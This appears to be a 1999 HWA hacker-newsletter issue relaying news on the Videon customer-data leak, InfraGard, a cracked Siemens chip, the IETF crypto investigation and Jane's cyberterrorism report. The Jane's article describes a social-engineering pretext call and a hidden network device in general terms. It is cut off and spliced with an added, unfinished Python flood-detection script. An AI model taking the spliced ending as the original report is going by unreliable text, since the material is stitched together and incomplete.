07.0 Personal Info of Canadian ISP Users Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Astroboyz and dj.tazz

The personal information on almost 2,700 Internet users in Manitoba, Canada was stolen and spread across the Internet. Users of Videon Wave's Internet cable services had their account numbers, along with customer names, addresses, phone numbers, user names and passwords stolen. The intrusion into Videon systems took place almost two weeks ago; however, the company never notified any of the affected customers. The incident has not been reported to the local Police or the RCMP.

Winnipeg Free Press
Does anyone have a better link? This one is about to expire.
http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3673?search

Hackers tear cover off Videon security
Tue, Nov 30, 1999
By Doug Nairne
Legislature Reporter

PERSONAL INFORMATION on almost 2,700 Videon cable modem customers has been obtained by Internet hackers in what is being called one of the most damaging computer attacks ever against a Manitoba company.

The information has become a hot property as it is passed around the city's computer underground, while irate customers are demanding to know why Videon didn't notify them that their names, phone numbers and passwords had been taken.

The list includes 2,688 Videon account numbers, along with customer names, addresses, phone numbers, user names and passwords.
Reid Eby, an Internet security consultant and president of Interlink Online Services, said hackers could use the information to access people's Internet accounts and send and receive e-mail as if they were the owner. E-mail that has already been downloaded to a computer is safe, but all incoming messages can be intercepted. There is no impact on Videon cable TV subscribers, only cable modem users.

"If they got the user names and passwords, this is the worst incident I've ever heard about locally," Eby said. "Given what is going on with hacking, placing any client information on-line in this day and age is silly."

Eby said the Videon information would also be valuable for sale to direct marketers and junk mailers, who would covet the contact data for high-end computer users. Anyone who does any business transactions on-line may also be in danger, especially if their credit card numbers are transmitted back to them in a receipt. Hackers could also use the information to "socially engineer" a target, tricking people into revealing more information about themselves or making their computers vulnerable to intrusion.

Videon spokeswoman Nadine Delisle said that a routine security sweep last week showed that customer information had been pilfered. She claimed that no passwords were obtained, although lists being circulated clearly include passwords, user names and other information.

Despite the criminal nature of the intrusion, city police and RCMP said the incident has not been reported to their investigators. Sources say the hack took place during the second week of November, but none of the Videon customers contacted by the Free Press yesterday knew that anything had happened.

"I'm a little surprised that we were never notified about this," said businessman Sam Katz, whose wife's personal cellular phone number is on the list, along with his other information. "I'd like to think these things are a little bit better secured."
Delisle said Videon decided the information wasn't sensitive, so customers were not informed about the security breach. "The risk seemed to be very minimal," she said. "It was not assessed to be important."

Katz disagreed, saying he plans to find out why he wasn't notified.

Winnipeg police Const. Bob Johnson said companies often don't report hacking because they are concerned about bad publicity. Delisle said the incident was not "serious enough" to report to police. "We closed the security hole so that this will not happen again, that was the priority," she said.

But a spokeswoman with the Canadian Radio-television and Telecommunications Commission said Videon customers can file a complaint against Videon and demand an explanation. "People should be able to get the reasons why their private information was leaked out," she said.

The customer list contains a wide cross-section of Winnipeggers, including doctors, business people, university professors, journalists and even computer security experts. The hackers say they could pose as any one of the people on the list, although there is no evidence that anyone has done so yet.

Hackers contacted said they were particularly pleased to get the personal information of one Videon customer -- a computer security expert who has written articles on the psychology of hackers, describing them as geeks and loners.

Meanwhile, Ron Campbell, another cable modem customer whose details have been disclosed, said he is upset about the incident but that he doesn't blame Videon for the security breach. "I don't particularly think Videon could have stopped this from happening," he said. "I assume they had some security in place."

[Photo illustration by Joe Bryksa/Winnipeg Free Press: Hackers managed to breach Videon's security and gain access to customers' personal files.]
@HWA

08.0 First Internet Piracy Case in Japan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Galleon

A 21-year-old student has been accused of illegally distributing over 170 titles of game software for different Nintendo machines. This is the first case of an unauthorized delivery of game software via the Internet in Japan.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/85776

Hokkaido Police Pursue Unauthorized Net Delivery of Game Software
December 1, 1999 (TOKYO)

The Hokkaido Prefectural Police's Sapporo Kita Station alleged that a college student delivered unauthorized game software over the Internet. It sent papers on Nov. 25, 1999 to the Sapporo District Prosecutor's Office for prosecution.

The 21-year-old student, who has been accused of illegally distributing about 180 titles of game software for Family Computer (Famicon) and Game Boy game machines made by Nintendo Co., Ltd., is suspected of infringing on rights under the Copyright Law. The case is the first disclosure of an unauthorized delivery of game software via the Internet in Japan.

The college student reportedly distributed the software on his own Web page, labeled as "information exchange," to seem as if the delivery did not constitute downloading of game software.

Game software for sale is usually recorded in read-only memory (ROM). The student ran software which emulates a game machine on a personal computer, and stored the game software recorded in these ROMs on a hard disk drive on the PC and uploaded it onto a Web server.

According to the Association for Copyright for Computer Software (ACCS), which assisted the police in the disclosure of the case, there seemed to be a lot of downloading from the suspect's Web site, but it does not know how many downloads were actually made.

An ACCS spokesman said that software distribution without authorization of an author itself is unlawful.
In addition, the suspect knew the case was illegal, intentionally concealed the illegal uploading and downloading and distributed not just a few software programs over the Internet, the spokesman said.

ACCS assumes there must be many other cases of illegal uploading and downloading of game software via the Internet. The association therefore hopes that the disclosure of the case will serve as a warning to the public.

[Comment by BizTech]

The disclosure of the illegal uploading and downloading of game software was based on a "breach of the Copyright Law." However, there are various applications of the Copyright Law depending on the case. In this case, the college student was suspected of "infringing on the right of public transmission under the Copyright Law."

The right of public transmission (Article 23 of the Copyright Law) is an author's proprietary right to transmit his or her work to the general public via broadcasting and/or communications. For example, an author's authorization will be needed for any broadcasting of a work in a television or radio program. (Note. In Japan, granting of copyrights and collection of license fees for the majority of musical works are performed by the Japanese Society for Rights of Authors, Composers and Publishers (JASRAC).)

Distribution of works over the Internet is included in the public transmission right. Distribution of any software and musical data over the Internet shall constitute infringement on the public transmission right and thus breaches the Copyright Law. (Note. Any case which constitutes "reference" under the Copyright Law shall be excluded from this case.)

For example, if someone transforms Celine Dion's hit number, "My heart will go on," into MIDI data without obtaining Dion's permission and plays the song on his or her own Web site as background music, strictly speaking such an act would constitute infringement of the public transmission right.
(Note: Any works whose copyright is obviously expired shall be excluded from this case. For example, any distribution of MIDI data of well-known works such as a composition made by Mozart, Beethoven or Chopin, is generally legal.)

In this case, the college student uploaded game software on a Web server without obtaining authorization of the authors of the game software, and enabled anybody who can access the Web site to download the software programs. This is called "enabling of public transmission." The case infringes on the public transmission right.

In addition to infringing on the public transmission right, the suspected student also breached the Copyright Law for uploading of the game software on the Web server because the student made unauthorized copies of software (Infringement on the reproduction right, Article 21 of the Copyright Law). In the case, the suspect made unauthorized copies when copying the game software from ROMs to the hard disk drive of his or her PC and when copying it from the hard disk drive to a hard drive on the Web server. Because the suspect's ultimate objective was to distribute software over the Internet, the case does not constitute a "reproduction for private use" under Article 30 of the Copyright Law, and thus breaches the Copyright Law.

The suspect repeatedly breached more than one provision of the Copyright Law, even though the other breaches were not disclosed.

(Kazumi Tanaka, Deputy Editor, BizTech News Dept.)

@HWA

09.0 FBI Launches InfraGuard in Ohio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

A national program known as InfraGuard, developed by the FBI to promote information sharing among law enforcement, industry, the academic community and the public about computer network intrusions and computer system vulnerabilities, was officially launched in Ohio yesterday. Over 200 people were expected at the kickoff meeting.
(Watch for an exclusive insiders report on InfraGuard coming soon to HNN.)

The Cincinnati Post
http://www.cincypost.com/news/hacker112999.html

CINCINNATI POST

FBI leads new effort to help thwart hackers
Post staff report

Nearly 200 people were expected at today's kickoff meeting of a group organized by the FBI to thwart hackers from breaking into government, industry and academic computer systems in Cincinnati and southern Ohio.

Speakers included Cincinnati FBI agent in charge Sheri Farrar, Southern Ohio U.S. Attorney Sharon Zealey, Ohio Bureau of Criminal Identification and Investigation Superintendent Ted Almay and representatives from the FBI's National Infrastructure Protection Center.

The regional meeting, held at Deer Creek State Park in Pickaway County, is part of a national program developed by the FBI and industry to promote information sharing among law enforcement, industry, the academic community and the public about computer network hacking and computer system vulnerabilities.

So-called ''InfraGard'' chapters are designed to help protect the nation's information systems from cyber and physical threats. The Cincinnati FBI's chapter includes the 48 southern-most Ohio counties, including Cincinnati, Dayton and Columbus.

A national InfraGard program was developed after President Clinton directed the FBI to identify and coordinate computer infrastructure protection experts inside and outside the federal government.

Members of the Cincinnati chapter include the Ohio Supercomputer Center, American Electric Power, Ohio State University and Bank One.

Members eventually will have access to an Alert Network that will allow them to use encryption technology to report attacks on their computer systems to the FBI. The FBI will provide what it calls a ''sanitized'' description of the incident, without identifying the source of the report, to other chapter members so they can take actions to protect their own systems.
Members also will have access to an InfraGard Web site being created by the FBI that will provide timely information about computer protection issues.

Target: Hackers

InfraGard is seeking more regional chapter members from telecommunications, banking, energy and transportation industries, as well as from academic institutions, hospitals and government agencies.

For more information, call Cincinnati FBI agent Roger Wilson at (513) 421-4310.

Publication date: 11-29-99

@HWA

10.0 National Gun Database Goes Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

A national gun database, Online Lead, was activated Tuesday at all 331 branches of the Treasury Department's Bureau of Alcohol, Tobacco and Firearms. The system is available to police and other local law enforcement officials through ATF offices. The database includes the gun's make and serial number, and the complete chain of sale from manufacturer to wholesaler or distributor to the first retail sale by a federally licensed gun dealer. Officials have said that security measures to protect the database from malicious intruders have been taken but did not elaborate.

Associated Press
http://library.northernlight.com/EB19991130720000025.html?cb=0&dx=1006&sc=0#doc

Story Filed: Tuesday, November 30, 1999 11:44 AM EDT

WASHINGTON (AP) -- Federal and local law enforcement officials are getting a new high-tech tool to fight crime: a nationwide computer system that aims to trace guns used during crimes.

The system, called Online Lead, is administered by the Treasury Department's Bureau of Alcohol, Tobacco and Firearms and has been operating on a limited trial basis since February.

``Online Lead takes our fight against gun traffickers into cyberspace,'' said Treasury Secretary Lawrence Summers, who made the announcement today.
``It gives federal, state and local law enforcement officials throughout the country a new tool to help identify and arrest gun traffickers.''

Starting today the computer system is operating full time and is widely available. Specifically, the system is in use at all 331 ATF field offices. Although police and other local law enforcement officials can't tap directly into the system on their own, they can access the system through ATF.

Local law enforcement officials are encouraged but not required to ask ATF to trace guns used during crimes. The results of those traces are entered into a growing national database, which now has information on more than 1 million traced firearms.

ATF has been tracing guns used in crimes for years, but the sophisticated software used in the new online system should make it much easier for investigators to analyze trends and patterns in illegal firearms trafficking, law enforcement officials said. For police and other local law enforcers, the system may provide new leads and additional information about crimes, they said.

Online Lead is updated frequently and provides information on a traced gun one day after it is completed.

The new system evolved from earlier projects that aim to provide investigators access to data on guns used in crimes. Those systems stored information on traced guns on computer discs that had to be shipped to ATF field offices, a slow process. The new online system gives law enforcers fast access to such information.

Information about all firearms traced by the ATF goes into the national database and is available on the new online system.

What agents can trace is limited. They start with a gun's make and serial number, moving forward from the manufacturer to a wholesaler and distributor to the first retail sale by a federally licensed gun dealer. All sales by licensed dealers must be recorded, and those records must be made available to ATF.
But any sales by individuals or by collectors at gun shows, for example, are considered private and exempt from such record-keeping requirements.

Copyright © 1999 Associated Press Information Services, all rights reserved.

@HWA

11.0 Zero Knowledge Ships Freedom, Finally
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Jordan

After what seemed like an agonizingly long beta period Zero Knowledge Systems has finally shipped Freedom 1.0. Freedom works seamlessly alongside your favorite browser and other Internet applications. You can surf the web, send email, chat, telnet, and participate in newsgroups as you normally would, only now with complete confidence that your personal information is not being collected without your consent. Freedom identifies you on the net with a 'nym' that you choose. There can be only one 'nym' so unless you want something like 'Tom4538720' you should reserve yours today.

Freedom 1.0
http://www.zks.net/clickthrough/click.asp?partner_id=542

@HWA

12.0 OpenBSD 2.6 Ships
     ~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Theo

What is probably the most secure operating system available has shipped its new version. OpenBSD 2.6 is a FREE, multi-platform 4.4BSD-based UNIX-like operating system. It emphasizes portability, standardization, correctness, proactive security and integrated cryptography. Some of the new features include the addition of ssh (OpenSSH) and Perl 5.005_03 to the base system, reliability patches for the PowerPC port, improved support for ext2fs, USB support, a faster install process and a lot more.

OpenBSD
http://www.openbsd.org/

@HWA

13.0 Videon Was Warned of Data Loss
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by dj.tazz and P_Simm

The Canadian ISP, Videon, was warned that it had left its customer database available on the web for all to see.
Days later, after the database had made the rounds on the net, the security issue was resolved. Customers however were never notified by the company. They did not find out about the problem until weeks later when it appeared in the local newspaper. Videon has confirmed that they received the emailed warning and failed to act in a timely manner to prevent the loss of customer account numbers, names, addresses, phone numbers, user names and passwords.

Winnipeg Free Press
http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3772?search

Videon ignored Web security breach
E-mail warning of leak never received reply

Wed, Dec 1, 1999
By Doug Nairne
Legislature Reporter

VIDEON WAS warned that its cable modem customer list was left unprotected on the Internet but failed to act for at least a day, allowing hackers a chance to pilfer the sensitive information, the Free Press has learned.

An e-mail message identifying the security leak was sent to Videon security staff on Nov. 10, which is thought to be the day prior to when personal details on about 2,700 people were downloaded.

A man who asked to be identified only by his computer user name, "Grub," said he sent the warning after stumbling on the customer data base while surfing the Videon Web site.

Despite Videon's insistence that the information was taken after a "deliberate attack," Grub said he found it sitting out in the open where anyone could have seen it.

"When I found this I thought, 'Holy smokes, I can't believe this is up there,' " he said. "They might as well have written out the list and taped it to the front door."

Grub said he e-mailed Videon warning them of the problem but never received a reply.

"They make it sound like a big computer attack, but it was probably just their own stupidity," he said.

Sometime later, the list was discovered by someone else and copies began to be made.
According to Videon, customer names, addresses and phone numbers have been posted to an Internet chat group, where it would be widely accessible.

Videon spokeswoman Nadine Delisle confirmed that Videon received the warning e-mail. She said that a combination of bad judgment by staff and the Remembrance Day holiday resulted in the message initially being ignored.

"At the time it was not perceived to be a big risk," she said. "In retrospect, that may have been an error in judgment."

Hackers ended up getting what they describe as a gold-mine of information, including account numbers, names, addresses, phone numbers, user names and passwords. They say the information can be used to intercept people's e-mail or to assume someone else's identity on the Internet.

After playing down the security leak Monday, Videon was scrambling to deal with the crisis yesterday. Senior executives and communications staff were in emergency meetings most of the day.

Delisle said Videon was planning a massive e-mail broadcast to all its cable modem customers to inform them of the incident, and will provide instructions on how to take precautions like changing passwords. She said Videon also wants to reassure people that their billing information and credit card numbers were not revealed.

An internal investigation is being carried out, and an outside firm will be brought in to do a full security audit, Delisle said.

About a dozen angry customers called the Free Press yesterday, most wanting to know why Videon didn't tell anyone what had happened -- including the police -- until yesterday, more than two weeks after they found out the information was taken.

While passwords can be quickly changed, other information like addresses and phone numbers is also being passed around, leaving people vulnerable.

One woman, who asked not to be identified, said she is outraged that she was not told her information had been downloaded.
"Anyone with a computer may be able to get my name and phone number, and address," she said. "My daughter won't be playing outside alone anytime soon, because now I won't know if some pervert has gotten my address and is lurking around my house."

The woman said she is considering cancelling her account.

Delisle said that in retrospect the decision to keep the incident quiet may not have been the right one.

"We're still piecing together all the details of what happened," she said. "The important thing is that this does not happen again."

Videon will set up a Web site to help customers at www.videon.ca/secure and also plans to take out ads in Winnipeg newspapers to explain what happened.

Videon customers have set up at least one other site with instructions on changing passwords. After being on-line for only 90 minutes, the site had 29 hits.

@HWA

14.0 German Digital Signature Chip Broke
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by cripto

After months of intense lobbying for a secure system, and only days after being ratified by the European Union, the German Digital Signature has been broken. The digital signature card, developed by Siemens, is to be used in cashless payment systems and access control systems. With data dumps of the SLC44/66 chip and information explaining its design floating around the Internet, anyone using the so-called Geldkarte system stands the risk of having money transferred without their knowing it.

The UK Register
http://www.theregister.co.uk/991201-000021.html

Posted 01/12/99 4:19pm by Mike Magee

Siemens German digital signature chip hacked

Hackers have succeeded in cracking the Siemens digital signature card used in cashless payment systems and access control systems across the country.

The German Digital Signature was ratified by the European Union only a few days ago, after intense lobbying for a secure system for transactions.
The serious breach of security means that anyone using the so-called Geldkarte system stands the risk of having money transferred without their knowing it.

A disassembled dump of the SLC44/66 chipcard CPU in TeX, along with two pages of German text explaining the design, has been available on bulletin boards for some time, according to the source.

The dump is currently being re-engineered and commented, according to a source, and the knowledge gained has already been used to get hold of Telesec private keys.

@HWA

15.0 IETF Members Under Investigation For Treason
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Some members of the Internet Engineering Task Force seem to be under investigation by the DOJ and FBI. The reason for the investigations seems to be the desire to include encryption and exclude back door capabilities in new protocols proposed by the IETF. The investigations are centered around treason charges.

NT Security
http://www.ntsecurity.net/go/2c.asp?f=/news.asp?IDF=186&TB=news

ZD Net
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2398590,00.html

Crypto Advocate Under FBI Investigation

Tuesday, November 30, 1999 - We recently published a story regarding cryptography and IPv6, where someone at the Department of Justice accused Scott Bradner, Internet Engineering Task Force (IETF) area coordinator, of an anti-social act by trying to get encryption inserted into the new protocol. Later, at an IETF meeting where votes were taken for IPv6 encryption inclusion, Fore System's Brian Rosen brazenly claimed that regardless of any encryption inclusion, Fore Systems would proceed by including back doors into any included encryption technology. But the harassment of the IETF doesn't stop there.

Just how far will our federal government go towards controlling strong encryption? Apparently, very far. And this isn't a new effort by any means.
We learned that William Allen Simpson, a Detroit-based computer consultant who was on the IETF staff, has been investigated by the federal government for treason charges. Simpson was the person that argued loudly for encryption to be included in the PPP protocol when it was still in design phases. That push landed Simpson in hot whatever with federal officials.

Simpson learned through friends that he was under investigation for treason -- the FBI had been interviewing his friends and associates. Simpson obtained 54 pages of documents from the government under the Freedom of Information Act, however the documents were heavily censored, including the bureau's basis for the investigation. According to a ZDTV report, Simpson did learn that the FBI had accused him of "challenging authority and laws that may impinge upon his activities."

Wait a second! Isn't that part of what the Constitution is all about--the means to peacefully object to the laws of the land? I think so. And if that's true, then that certainly positions the FBI in a bad light since it would appear their actions are counter to Constitutional rights. It is not against the law to develop strong cryptography, but it is against the law to export that technology outside of proper governmental controls. The PPP protocol did not have encryption at the time--it was only a suggested inclusion--so why investigate a person for doing something completely legal?

The IETF is an open public standards body that conducts its business in clear public view. They help steer standards that better ensure compatibility and interoperability. So why would the FBI investigate an IETF member just because that person suggested in a public meeting that strong encryption be included in a standard wide-spread protocol such as PPP?

ZDnet; The New Crypto-Commies

Could arguing for strong encryption be the next 'un-American activity' that justifies blacklists and secret FBI investigations?
By Kevin Poulsen
November 24, 1999

Newly released documents show that the FBI closely monitored a key member of the standard-setting Internet Engineering Task Force (IETF) in 1992 and 1993, as he waged a doomed battle to inject crypto support into an emerging critical Internet standard.

William Allen Simpson, a Detroit-based computer consultant, was on the IETF. The team was developing the "Point to Point Protocol" (PPP), designed to facilitate Internet access over dial-up modems. Simpson was making waves in the PPP Working Group by loudly arguing for inclusion of crypto support in the protocol, which today is used by the vast majority of home Internet users to go online.

In 1993, Simpson learned from a family member and colleagues that his efforts had drawn the FBI's interest. As he recalls it, the bureau was accusing him of a capital offense.

"Two guys came up to me at a meeting," Simpson recalls. "They said, 'Bill, I was interviewed for a treason investigation by the FBI'."

"Bill was advocating encryption for authentication and for privacy in standardized Internet protocols," recalls Electronic Frontier Foundation cofounder John Gilmore, who heard of the investigation and suggested that Simpson request his FBI file under the Freedom of Information Act.

"He's kind of an iconoclast," Gilmore told me. "He follows his own way and sometimes it pisses people off, but it can be an advantage when you're faced with a Kafkaesque investigation by the government. He has the tenacity to stick with it until he finds the truth."

After six years of wrangling, Simpson finally pried 54 pages from the grasping hands of the domestic spies last Wednesday, only to find that the documents were heavily censored.

@HWA

16.0 Jane's Releases Cyberterrorism Report
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex

Jane's Information Group has released its much anticipated report on cyberterrorism.
While the actual information in the article seems rudimentary and crude, its conclusions about the possibility of a full out terrorist attack over the internet being extremely remote seem dead on. (Warning: this is an extremely long and dry article that presents little new information.)

Jane's Defense Weekly
http://jir.janes.com/sample/jir0525.html

Cyberterrorism hype

With the 1990s propensity to dot.com everything that moves, 'hacking' and 'cyberterrorism' have become subjects of intense media coverage. Almost daily, hitherto unknown security specialists warn of potential catastrophes: news that gets picked up by the media and crosses the globe with impunity. Johan J Ingles-le Nobel discussed the subject with programmers at Slashdot to profile so-called cyberterrorists and examine the viability of cyberwarfare.

Cyberterrorism is a buzzword of 1999. Indeed, with the remarkable growth of the Internet, hacking horror stories have reached new heights of publicity, leading to a veritable media frenzy. Yet careful examination of the issue reveals much of the threat to be unsubstantiated rumour and media exaggeration. The exaggeration is understandable, however - these technologies underpin our entire society, and what paper can resist printing a scoop revealing that banks are being blackmailed with threats of attacks on their computers, or that a military satellite has been hijacked by hackers? The idea that an anonymous teenager working alone from his bedroom can wreak electronic havoc on the far side of the world makes for good press.

What is a hacker?

Nothing gets a hacker's back up quicker than someone confusing a hacker with a cracker. The term 'hacker' refers to an individual who programmes enthusiastically (even obsessively), enjoys programming or is especially good at programming; a 'cracker' is somebody who breaks into another's computer systems or digs into their code (to make a copy-protected programme run).
Yet the boundaries have become somewhat blurred and the popular understanding of these terms is quite wrong: ever since Hollywood produced 'Wargames', based on Kevin Mitnick's cracking activities (known as 'exploits'), the term 'hacking' has become synonymous with unauthorised access into restricted systems - which is 'cracking'. In today's world, such activity also includes the deliberate defacement of websites. Hackers are quick to point out that there is a code of hacker ethics that precludes any profit from the activity - the only motive is the activity itself - but they are not naïve: realising the potential for misuse, they divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat' hackers (crackers).

According to hackers, 99% of cracking incidents can be blamed on so-called 'script-kiddies'. These are usually young people who manage to acquire some 'cracking tools' somewhere on the Internet and are keen to try them. They choose a 'cool' target (such as NASA, the Pentagon or the White House) and launch the tools. Older, more established hackers see them as upstarts. Think of a kid walking down a corridor testing doorknobs; whilst they are more than capable of defacing websites such as that of the Central Intelligence Agency (CIA), their actions are seen as the equivalent of putting down a whoopie cushion on the chair of the UN Secretary General - juvenile, noisy and somewhat embarrassing, but ultimately without real effect. Says Mick Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about waking up to find graffiti (which is all it is) on one of my customer's sites."

However, even minor exploits illustrate one of the many paradoxes facing computer security. Specific websites, intended for the computer systems administrators and webmaster audiences, monitor the security vulnerabilities (bugs) in software that allow exploits to take place.
The purpose of these websites is to distribute the corrective programming 'patches' that rectify the bugs. However, such sites are open to the public and are therefore the ideal place for crackers to discover new cracks. The result of this is that the vast majority of methods used by crackers to break into sites are known and there are patches available. This means that many believe the responsibility for security breaches lies not with the software supplier but with the company that owns and operates the system. Thus, if a company suffers a security breach, that highlights its own negligence or incompetence, which, along with the bad publicity associated with intrusions, makes it unsurprising that many companies are reluctant to publicise security breaches of their systems. This is especially true of the financial sector: there have been rumours for several years that banks have been blackmailed by hackers; confirmation has never been forthcoming.

Cracker profile

Global estimates vary, but a JIR extrapolation based on mid-1990 estimates by Bruce Sterling, author of The Hacker Crackdown: Law and Disorder on the Electronic Frontier, puts the total number of hackers at about 100,000, of which 10,000 are dedicated and obsessed computer enthusiasts. A group of 250-1,000 are in the so-called hacker 'élite', skilled enough to penetrate corporate systems and to unnerve corporate security. Given the huge number of people working as programmers for the online economy (the technical side of which requires much the same skills as those required by a hacker), the totals are sure to rise. According to the Center for Research on Electronic Commerce at the University of Texas, in 1998 the Internet economy was worth US$301.4 billion, providing 1.2 million jobs in the USA alone.

The minimum skill-set needed to be a 'script-kiddy' is simply the ability to read English and follow directions.
Indeed, much can be gleaned from books or documents and mailing lists online such as 'L0pht' bulletins and 'Phrack', whilst exploits can be learned from websites such as 'bugtraq', 'rootshell' or 'packetstorm'. In fact, virus-writing and exploit code is common, and some is even automated. However, to launch a sophisticated attack against a hardened target requires three to four years of practice in C, C++, Perl and Java (computer languages), general UNIX and NT systems administration (types of computer platform), LAN/WAN theory, remote access and common security protocols (network skills) and a lot of free time. On top of these technical nuts and bolts, there are certain skills that must be acquired within the cracker community.

    'Hi, I'm Cheryl, I'm new in IT support. I'm having trouble with the modem bank. Can you check the modem to make sure it's turned on? Also, can I have the number to make sure I'm using the right one?' Of course, being a diligent and helpful worker, the recipient of such a call may be only too happy to help.

Tools of the trade

The cracker skillset is more common in highly educated individuals taught in the USA and Western Europe, although anyone with enough intelligence and time can pick it up without formal schooling. In fact, the skills are not at all rare or unusual, being the same as those required for an average, small or medium-sized company network system administrator: a position which commands among the lowest pay in the computer industry. The chances are that there is a university drop-out in your town with all of these prerequisites. That said, a list of qualifications does not fully explain their make-up, as the skillset is more to do with lifestyle than specific capabilities. Some people collect baseball cards; others analyse [computer network] protocols.

Attacks happen in various guises, from the simple and automated to the highly disguised and sophisticated.
Crackers also write their own tools, which are disseminated in the underground. Certain system diagnostic tools and other cracker script tools can significantly automate the process of cracking less secure systems. At the low end of the sophistication scale there are activism websites, such as 'Floodnet', which hold web-page functionality that automates the process of reloading another website's pages in an attempt to make the system 'overheat' so that it ceases to work. This is a form of the most common exploit, Denial of Service (DoS), which comes in many forms. It is most common due to webmasters and web server administrators creating poorly written Common Gateway Interface (CGI) scripts (website programming). Exploiting the poorly written code is no great feat. In the words of one hacker: "Any punk kid could do this to any organisation without any trouble whatsoever."

Computer specialists suggest that, while annoying, such unsophisticated DoS attacks have a hidden danger: they could mask the use of specialist software custom-written by an élite cracker amid the noise of the barrage of multiple automated attacks. Other tools exist that are designed by the hacker community, such as BO2000, which was specifically created to embarrass Microsoft's Windows NT security. In fact, the size of the black market in software (computer programmes) is enormous. Not only can exploit tools be procured in this manner, but they can easily be found online.

Social engineering

Social engineering is a term describing the process whereby crackers engineer a social situation that allows any potential cracker to obtain access to an otherwise closed network. This access could either be permanent (infiltrating an insider into the organisation who enables outside access), or temporary. Indeed, the scenario has a stunning simplicity about it: "Hi, I'm Cheryl. I'm new in IT support. I'm having trouble with the modem bank. Can you check the modem to make sure it's turned on?
Also, can I have the number to make sure I'm using the right one?" Of course, being a diligent and helpful worker, the recipient of such a call is only too happy to help.

Most previous instances of information technology (IT) security violations have been attributable to 'inside jobs', which is why there has been significant controversy recently about US concerns hiring foreign programmers to rectify Y2K issues. Having gained access, a cracker can either install code directly into the systems on the spot or add a transmitter device. To illustrate a scenario, after gaining access to a facility as cleaning staff, the perpetrator could put a small computer, itself connected to the main network, into the base of a lamp with an infra-red port (network connection) aimed out the window of an office or linked to a mobile phone. This gives an active presence on the target network and, more importantly, remote access to the device from anywhere within line of sight.

In commercial environments, the security teams that search for bugs (bugs in the classical sense - 'listening devices') with receivers do not generally do infra-red profiles of a building; such a device will not transmit unless active, so sweeping for it is more difficult than trying to detect a bug that is monitoring audio. Cellular modems also work, but are potentially detectable by radio-frequency sweeps. However, for corporate espionage it is an easy matter to pre-position several such systems and then take advantage of security vulnerabilities to gain permanent entry to the system. The phone company makes entry easy if the location is near a residential area as a receiving mobile phone just needs to be plugged into the network interface (telephone connection) of any house. Such attacks are not new, but the scale of machines necessary to realise them is down to 4in² of PC board for an amateur willing to spend a little time shopping in the back of a technology magazine.
"For less than US$1,000 you could build such systems and disguise them as appliances like lamps," said Paul Roberts, a US-based information security (INFOSEC) specialist.

Espionage on other computers by remotely monitoring the electro-magnetic (EM) signals they emit whilst in use is possible today, albeit expensive. Figures of $35,000 are quoted as estimates for a remote monitoring station in a van, for example, although the cost is coming down. "EM snooping technology might very well come into the reach of the advanced information security hobbyist or the determined criminal in the next five to 10 years," said Markus G Kuhn from the Computer Laboratory at Cambridge University in the UK.

Cracking: methods

Exploits come mainly in three species: DoS; destruction of information (erasing); and corruption of information (spoofing). As indicated previously, DoS attacks take the form of overloading the processes of the computer hosting the website (the server), which then shuts itself down. Recently, a new form of such attacks has become prevalent - the 'distributed co-ordinated attack' - in which thousands of servers are used in unison. "It's possible to detect the attack, but it is very hard to block it using current software," said Thomas Longstaff, senior technical researcher for the Software Institute at Carnegie Mellon University. However, a co-ordinated attack to bring down a government's or a corporation's computer systems cannot be maintained long enough to be little more than a nuisance. Yet while only annoying at the moment, as interconnectivity increases and the importance of the online economy becomes manifest, such exploits will have serious financial implications. That said, recovery from such an attack tends to be fast.

Erasing is considered very difficult to conduct because any system worth attacking is also worth backing up.
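Longstaff's remark above, that a distributed co-ordinated attack is easy to detect but hard to block, follows from its shape in the server's own logs: one resource, a burst of requests, and so many distinct sources that no single address stands out. The Python below is an added example, not code from the Jane's report or from HNN. It parses Common Log Format lines and reports any one-second bucket where a path is hit above a rate threshold by more than a threshold number of distinct sources; the log lines, addresses, CGI path and both thresholds are constructed assumptions.

```python
"""Flag a distributed, co-ordinated flood in web-server access logs.

Added example, not code from the Jane's report or from HNN. The log lines
are constructed; the host addresses, the CGI path and the two thresholds
are assumptions for illustration, not values from the article.
"""
import re
from collections import defaultdict
from datetime import datetime

# Common Log Format: host ident user [timestamp] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Constructed traffic: 300 different source addresses request the same CGI
# script, 100 per second over three seconds, mixed with two ordinary hits.
SAMPLE_LOG = "\n".join(
    [
        f"10.0.{i // 256}.{i % 256} - - [01/Dec/1999:10:15:{1 + i % 3:02d} +0000] "
        '"GET /cgi-bin/search.cgi?q=x HTTP/1.0" 200 512'
        for i in range(300)
    ]
    + [
        '192.168.1.5 - - [01/Dec/1999:10:15:01 +0000] "GET /index.html HTTP/1.0" 200 2048',
        '192.168.1.6 - - [01/Dec/1999:10:15:02 +0000] "GET /news.html HTTP/1.0" 200 1024',
    ]
)


def parse_line(line):
    """Return (second, host, path) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
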